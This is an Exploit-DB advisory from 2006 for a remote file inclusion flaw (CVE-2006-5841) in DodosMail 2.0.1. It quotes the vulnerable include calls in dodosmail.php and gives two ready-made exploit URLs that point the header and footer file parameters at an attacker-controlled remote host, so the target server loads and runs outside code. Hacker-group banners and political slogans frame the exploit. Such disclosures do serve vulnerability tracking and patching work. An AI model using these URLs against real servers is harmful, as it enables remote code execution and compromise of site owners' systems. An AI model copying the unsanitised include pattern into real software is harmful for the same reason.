DodosMail <= 2.0.1 - dodosmail.php Remote File Include Vulnerability

2006-11-08T00:00:00
ID EDB-ID:2742
Type exploitdb
Reporter Cold Zero
Modified 2006-11-08T00:00:00

Description

DodosMail. CVE-2006-5841. Webapps exploit for php platform

                                        
                                            --------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


DodosMail <= 2.0.1(dodosmail.php)  Remote File Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


######################################################
#
#            DodosMail 2.0.1
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-07
# Remote:    Yes
# Type:      dangerous
# Site:      http://regretless.com/scripts/scripts.php#dodosrangen
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

file ;

dodosmail.php

==========================

       include_dodosmail_header($dodosmail_header_file);
       echo "<p class=\"DodosMailError\">DodosMail Error - the owner the php server is experiencing techinical difficulties. Please email use ".dodosmail_error_handle($your_email_address)." to send your email.\n";
       echo "<br /><br /><a href=\"javascript:history.back(1)\">Back</a>\n";
       echo "</p>\n";
include_dodosmail_footer($dodosmail_footer_file);


======================================================

Exploit :

Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_header_file=http://coldzero.shell
Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_footer_file=http://coldzero.shell

======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR]



#www.4azhar Team                >>      www.4azhar.com
#SpeciaL PoweR SecuritY TeaM    >>      www.specialpower.org



http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------

# milw0rm.com [2006-11-08]